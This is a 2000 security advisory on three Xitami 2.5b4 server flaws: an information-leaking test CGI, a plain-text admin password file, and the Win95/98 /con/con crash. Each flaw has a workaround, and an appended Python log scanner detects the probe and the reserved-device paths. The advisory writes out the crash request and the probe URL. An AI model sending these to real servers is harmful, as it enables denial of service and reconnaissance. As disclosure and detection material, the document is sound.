Network Security Solutions Inc. Security Advisory
(Philippine based Security Company)
Http://www.Nssolution.net
Http://connect.to/nssi

]*** Xitami WEB/FTP release 2.5b4 Server Multiple Security Vulnerabilities ***[

Author: Abraham Lincoln
Handle: zer0logic
Email: Abraham@nssolution.net, zer0logic@PrivacyX.Com, Abraham@Digital-Defense-Network.Net
Date Discovered: November 29, 2000
Vendor: iMatix Corporation

Disclaimer: This paper is intended for informational purposes only. The author is not responsible for the use and/or potential effects of these advisories. Read this at your own risk, or not at all.


1] 1st Vulnerability - TestCgi.exe file vulnerability

Version Affected: Xitami Web Server release 2.5b4 for Win 95 / 98 / NT / Win2k
Local : Yes
Remote: Yes
Risk: Medium

Problem Description:

The default installation of the Xitami web server ships a /cgi-bin directory that contains testcgi.exe. Any remote user can execute it from a browser and view information about your system and the web server's directory layout.

Sample: Http://www.Target.com/cgi-bin/testcgi

Sample output:

  Environment Variables
  COMPUTERNAME = MYSERVER
  COMSPEC = C:\WINNT\system32\cmd.exe
  HOMEDRIVE = C:
  HOMEPATH = \
  LOGONSERVER = \\MYSERVER
  NUMBER_OF_PROCESSORS = 1
  OS = Windows_NT
  OS2LIBPATH = C:\WINNT\system32\os2\dll;
  PATH = C:\WINNT\system32;C:\WINNT
  PROCESSOR_ARCHITECTURE = x86
  PROCESSOR_IDENTIFIER = x86 Family 6 Model 8 Stepping 3, GenuineIntel
  PROCESSOR_LEVEL = 6
  PROCESSOR_REVISION = 0803
  SYSTEMDRIVE = C:
  SYSTEMROOT = C:\WINNT
  TEMP = C:\TEMP
  TMP = C:\TEMP
  USERDOMAIN = MYSERVER
  USERNAME = Administrator
  USERPROFILE = C:\WINNT\Profiles\Administrator
  WINDIR = C:\WINNT
  HTTP_ACCEPT_CHARSET = iso-8859-1,*,utf-8
  HTTP_ACCEPT_LANGUAGE = en
  HTTP_ACCEPT_ENCODING = gzip
  HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
  HTTP_HOST = 127.0.0.1
  HTTP_USER_AGENT = Mozilla/4.75 [en] (WinNT; U)
  HTTP_CONNECTION = Keep-Alive
  HTTP_CONTENT_LENGTH = 0
  SERVER_SOFTWARE = Xitami
  SERVER_VERSION = 2.5b4
  SERVER_NAME = 127.0.0.1
  SERVER_URL = http://127.0.0.1/
  SERVER_PORT = 0
  SERVER_PROTOCOL = HTTP/1.1
  SERVER_SECURITY = -
  GATEWAY_INTERFACE = CGI/1.1
  REQUEST_METHOD = GET
  QUERY_METHOD = GET
  SCRIPT_PATH = cgi-bin
  SCRIPT_NAME = /cgi-bin/testcgi
  CONTENT_TYPE =
  CONTENT_LENGTH = 0
  REMOTE_USER = -
  REMOTE_HOST = 127.0.0.1
  REMOTE_ADDR = 127.0.0.1
  PATH_INFO =
  PATH_TRANSLATED = C:/Xitami/webpages
  DOCUMENT_ROOT = C:/Xitami/webpages
  CGI_ROOT = C:/Xitami/cgi-bin
  CGI_URL = /cgi-bin
  CGI_STDIN = C:\TEMP\pipe0001.cgi
  CGI_STDOUT = C:\TEMP\pipe0001.cgo
  CGI_STDERR = cgierr.log

The problem lies in the default installation of the Xitami web server, whose /cgi-bin directory contains testcgi.exe. It lets a malicious user gather information about your system (paths, user name, OS details) that can then be used to penetrate the whole system.

Work Around: Delete the testcgi.exe file, or disable the cgi-bin directory in Xitami Administration under the CGI properties. Never run a default installation as-is; always reconfigure your web server after installing. Read the WWW Security FAQ and its material on CGI vulnerabilities at http://www.w3.org/Security/Faq/


2] 2nd Vulnerability - Plain text Password vulnerability

Version Affected: Xitami Web Server release 2.5b4 for Win 95 / 98 / NT / Win2k
Local : Yes
Remote: No
Risk: Medium

Problem Description:

I discovered that the Xitami web server stores the Xitami Web Server Administration password in plain text in the file defaults.aut, in the default installation folder of the Xitami web server, which is C:\Xitami. The same applies even if you change the installation folder.

Example: defaults.aut

  # Created at installation time
  #
  [/Admin]
  admin="root123"    <----- admin=username password=root123
  [Private]
  Jacky=robusta

The problem arises when an attacker gains physical access to the Xitami root directory and opens the file Defaults.Aut: the attacker can use it to gain administrator access to the web server administration site (for example http://localhost/admin) by entering the username and password stored in defaults.aut, and then has full access to the web server administration site.

If you try to move the password file to another folder, the next time you log on to the Xitami Web Administration site this error will appear:

  Abort at smthttp:Resolve-Virtual-Hostname: (Have-Client-Request, Finished-Event)

This leaves the web server unusable and you need to reinstall the whole application.

Work Around: Don't leave your workstation or server open to physical access to the root directory of the Xitami web server, and always change the default folder for the web server instead of using C:\Xitami.


3] 3rd Vulnerability - Xitami Web Server and FTP Server for Win95/Win98 are affected by the /CON/CON exploit

Version Affected: Xitami Web Server release 2.5b4 for Win 95 / 98
Local : Yes
Remote: Yes
Risk: High

Problem Description:

The Xitami web server and FTP server are still vulnerable to the /con/con bug of Windows 95 and 98, which causes the web server and FTP server to shut down or crash; sometimes the whole operating system gets a fatal error. The application needs to be restarted to resume normal operation.

The problem occurs when the attacker sends this request to the web server:

  GET /con/con HTTP/1.0

using a telnet client connected to the remote host (type --> Telnet 80). Once connected, send the GET /con/con HTTP/1.0 line and press Enter. The server will now crash or shut down if the operating system is not patched against the Con/Con bug.

On the FTP server, log in as an anonymous user or any user that is allowed access to the FTP server and execute this command:

  Ftp> cd /con/con

The FTP server will disconnect you from the remote host and shut down or crash.

Work Around: Install the Con/Con bug patch for your operating system. The patch is available from the Microsoft website or at http://packetstormsecurity.org/Win/ConConFix2.zip, because the bug also lies in your OS.


Vendor Status: iMatix Corporation has been notified of this vulnerability but no patch has been issued yet.

NOTE: Sorry for the grammar etc., because this is just a 5 minute exploit. If you have some questions, email me. All spam mails and lame emails are just ignored.

-zer0logic-

Related Links:
Http://www.nssolution.net
Http://connect.to/nssi
Http://www.Digital-Defense-Network.Net

Feedback and Inquiries: If you have any questions, inquiries, feedback, concerns or updates, please don't hesitate to email us.
For inquiries, concerns and updates - Info@Nssolution.net
For comments and questions - Abraham@nssolution.net, lincoln@privacyx.com, zer0logic@privacyx.com
IRC - Dal.net #DDN, Undernet #Hackphreak

Copyright (c) 2000-2001 Network Security Solutions Inc. Permission is hereby granted for the redistribution of this alert electronically. If you wish to reprint or modify this document, contact us first or email us at: info@Nssolution.Net
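As an added defensive check that is not part of the original advisory: a small Python access-log filter that flags the two request shapes the advisory describes, the testcgi probe (vulnerability 1) and paths containing a Windows reserved device name such as /con/con (vulnerability 3). It generalizes the second case to the other reserved names (PRN, AUX, NUL, COM1-9, LPT1-9) and to segments with an extension. The log format and client addresses are constructed sample data.

```python
import re

# Windows reserved device names; on Win95/98 any path segment that resolves to
# one of these (even with an extension, e.g. con.txt) opens the device rather
# than a file, which is what made /con/con crash unpatched hosts and daemons.
RESERVED_DEVICES = {"CON", "PRN", "AUX", "NUL"} | {
    "%s%d" % (p, i) for p in ("COM", "LPT") for i in range(1, 10)}

# Default-install probe that should be absent after hardening (vulnerability 1).
PROBE_PATHS = {"/cgi-bin/testcgi", "/cgi-bin/testcgi.exe"}

# Request part of a common-log-format line, e.g. "GET /con/con HTTP/1.0".
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d"')

def reserved_segments(path):
    """Return the path segments that name a Windows reserved device."""
    hits = []
    for seg in path.split("/"):
        if seg.split(".", 1)[0].upper() in RESERVED_DEVICES:
            hits.append(seg)
    return hits

def classify_request(path):
    """Label a request path, or return None when it looks harmless."""
    clean = path.split("?", 1)[0].lower().rstrip("/")
    if clean in PROBE_PATHS:
        return "testcgi-probe"
    if reserved_segments(clean):
        return "reserved-device-path"
    return None

def scan_log(lines):
    """Return (client_ip, path, verdict) for each suspicious request line."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        verdict = m and classify_request(m.group("path"))
        if verdict:
            findings.append((line.split(" ", 1)[0], m.group("path"), verdict))
    return findings

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Nov/2000:10:01:02 +0800] "GET /index.html HTTP/1.0" 200 512',
    '10.0.0.9 - - [29/Nov/2000:10:01:10 +0800] "GET /cgi-bin/testcgi HTTP/1.0" 200 2048',
    '10.0.0.9 - - [29/Nov/2000:10:02:00 +0800] "GET /con/con HTTP/1.0" 500 0',
    '10.0.0.7 - - [29/Nov/2000:10:03:30 +0800] "GET /images/aux.gif HTTP/1.1" 404 0',
]
```

Running scan_log(SAMPLE_LOG) yields three findings (the probe and two device-name paths); the same classify_request check can be placed in front of a server that must keep serving Win95/98 clients to reject such paths before they reach the filesystem.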